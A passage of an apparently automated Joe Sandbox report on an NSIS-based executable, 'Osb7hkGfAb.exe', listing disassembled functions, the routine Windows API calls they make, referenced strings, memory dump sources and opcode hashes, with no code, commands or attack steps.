                                                                          • CharPrevA.USER32(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                                                                          • *?|<>/":, xrefs: 0040641A
                                                                          • "C:\Users\user\Desktop\Osb7hkGfAb.exe", xrefs: 0040640E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Char$Next$Prev
                                                                          • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 589700163-2197625893
                                                                          • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                          • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                                          • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                          • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                                          Function 004041E2 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowLongA.USER32(?,000000EB), ref: 004041FF
                                                                          • GetSysColor.USER32(00000000), ref: 0040423D
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00404249
                                                                          • SetBkMode.GDI32(?,?), ref: 00404255
                                                                          • GetSysColor.USER32(?), ref: 00404268
                                                                          • SetBkColor.GDI32(?,?), ref: 00404278
                                                                          • DeleteObject.GDI32(?), ref: 00404292
                                                                          • CreateBrushIndirect.GDI32(?), ref: 0040429C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                          • String ID:
                                                                          • API String ID: 2320649405-0
                                                                          • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                          • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                                          • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                          • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                                          Function 700E24D8 Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 700E1215: GlobalAlloc.KERNEL32(00000040,700E1233,?,700E12CF,-700E404B,700E11AB,-000000A0), ref: 700E121D
                                                                          • GlobalFree.KERNEL32(?), ref: 700E25DE
                                                                          • GlobalFree.KERNEL32(00000000), ref: 700E2618
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2805650198.00000000700E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 700E0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2805623249.00000000700E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2805669903.00000000700E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2805690432.00000000700E5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_700e0000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc
                                                                          • String ID:
                                                                          • API String ID: 1780285237-0
                                                                          • Opcode ID: 1d9b5cfe2bb1ef461ce89144d8772c6b6c69d6ef011ce04dd1573b3797d80f8a
                                                                          • Instruction ID: ce9faf87b712bf98a103d70d39e528dacda296911306e02a459ac439837a9132
                                                                          • Opcode Fuzzy Hash: 1d9b5cfe2bb1ef461ce89144d8772c6b6c69d6ef011ce04dd1573b3797d80f8a
                                                                          • Instruction Fuzzy Hash: 8C41B273104600EFD316AF66CDD9D2EBBBAEB85F20B20496DF601B6260D735AD04DB61
                                                                          Function 0040521E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(0042A070,00000000,00424248,774D23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                          • lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,774D23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                          • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,774D23A0), ref: 0040527A
                                                                          • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                          • String ID:
                                                                          • API String ID: 2531174081-0
                                                                          • Opcode ID: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                                          • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                                          • Opcode Fuzzy Hash: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                                          • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                                          Function 00404ACE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                                          • GetMessagePos.USER32 ref: 00404AF1
                                                                          • ScreenToClient.USER32(?,?), ref: 00404B0B
                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Send$ClientScreen
                                                                          • String ID: f
                                                                          • API String ID: 41195575-1993550816
                                                                          • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                          • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                                          • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                          • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                                          Function 00402DBA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                          • MulDiv.KERNEL32(000D7516,00000064,000D8A80), ref: 00402E00
                                                                          • wsprintfA.USER32 ref: 00402E10
                                                                          • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                                          Strings
                                                                          • verifying installer: %d%%, xrefs: 00402E0A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                          • String ID: verifying installer: %d%%
                                                                          • API String ID: 1451636040-82062127
                                                                          • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                          • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                                          • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                          • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                                          Function 700E1837 Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2805650198.00000000700E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 700E0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2805623249.00000000700E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2805669903.00000000700E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2805690432.00000000700E5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_700e0000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: FreeGlobal
                                                                          • String ID:
                                                                          • API String ID: 2979337801-0
                                                                          • Opcode ID: 8474580710919f002e20149ec629575d9845bae9419bbc394b90d53bbeb0b8f0
                                                                          • Instruction ID: fb99750d276bd7d05a4c5759919a5852a2d130e4ea42012b8f2d5643bad631a4
                                                                          • Opcode Fuzzy Hash: 8474580710919f002e20149ec629575d9845bae9419bbc394b90d53bbeb0b8f0
                                                                          • Instruction Fuzzy Hash: EF51F472D00158AEDB12BFB7C8445FEBAFBAB48A71F1800EEE406B3356C6716D418752
                                                                          Function 00401D65 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                                          • GetClientRect.USER32(?,?), ref: 00401DCC
                                                                          • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                                          • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                                          • DeleteObject.GDI32(00000000), ref: 00401E20
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                          • String ID:
                                                                          • API String ID: 1849352358-0
                                                                          • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                          • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                                          • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                          • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                                          Function 004049C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                          • wsprintfA.USER32 ref: 00404A6A
                                                                          • SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                          • String ID: %u.%u%s%s
                                                                          • API String ID: 3540041739-3551169577
                                                                          • Opcode ID: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                                          • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                                          • Opcode Fuzzy Hash: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                                          • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                                          Function 00405A8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                                          • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 2659869361-2145255484
                                                                          • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                          • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                                          • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                          • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                                          Function 00402E3D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
                                                                          • GetTickCount.KERNEL32 ref: 00402E6E
                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                          • String ID:
                                                                          • API String ID: 2102729457-0
                                                                          • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                          • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                                          • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                          • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                                          Function 00405B7D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,datastrrelsers Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                            • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                          • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                                          • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,774D3410,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 3248276644-2145255484
                                                                          • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                          • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                                          • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                          • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                                          Function 00405192 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 004051C1
                                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00405212
                                                                            • Part of subcall function 004041C7: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
